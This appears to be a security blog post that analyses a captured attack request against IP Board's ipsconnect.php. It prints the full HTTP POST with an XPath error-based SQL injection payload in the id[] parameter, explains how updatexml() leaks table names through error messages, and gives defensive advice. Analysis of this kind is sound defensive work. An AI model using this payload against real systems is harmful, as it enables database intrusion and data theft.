POST /interface/ipsconnect/ipsconnect.php HTTP/1.1
Host: mywebsite.com
Connection: keep-alive
Accept: */*
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.6,en;q=0.4
Accept-Charset: utf-8;q=0.7,*;q=0.3
Accept-Encoding: gzip,deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 223
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36
act=login
idType=id
id[]=-1
id[]=-1) and 1!="'" and updatexml(NULL,concat(0x3a, ( select table_name from information_schema.tables where BINARY LEFT(table_name, 1) = 'nnn' LIMIT 0,1 ) ),NULL)-- -'
If you look at the request above you see it's sending a payload into the id[] parameter which must not be using parameterized queries and must not be sanitizing the values correctly. It looks like the id should be an integer, but in this case it allows strings, big ugly long strings, strings that contain sql code!
updatexml() is a mysql function that essentially does a xml string replaces. But it's interesting why they would be starting with a NULL string and replacing with a NULL string. Why? This is actually called XPath Error Based Injection. If it's a successful attack ,an error actually gets thrown, and the ERROR message itself contains the data exfiltration. In this case they are trying to grab the name of a particular SQL table to see if they've gained access to the database. If successful it'll probably display something like
Output : XPATH syntax error: ':tableNameHere'
To prevent this, make sure your IP Board software is updated/patched, have a WAF or IPS that blocks SQL Injection attacks, and from a coding perspective use parameterized SQL queries so you can't enter strings in for integers, and sanitize data so special characters like this aren't allowed either.
More about neonprimetime
Top Blogs of all-time
- pagerank botnet sql injection walk-thru
- DOM XSS 101 Walk-Through
- An Invoice email and a Hot mess of Java
Top Github Contributions
Copyright © 2016, this post cannot be reproduced or retransmitted in any form without reference to the original post.
No comments:
Post a Comment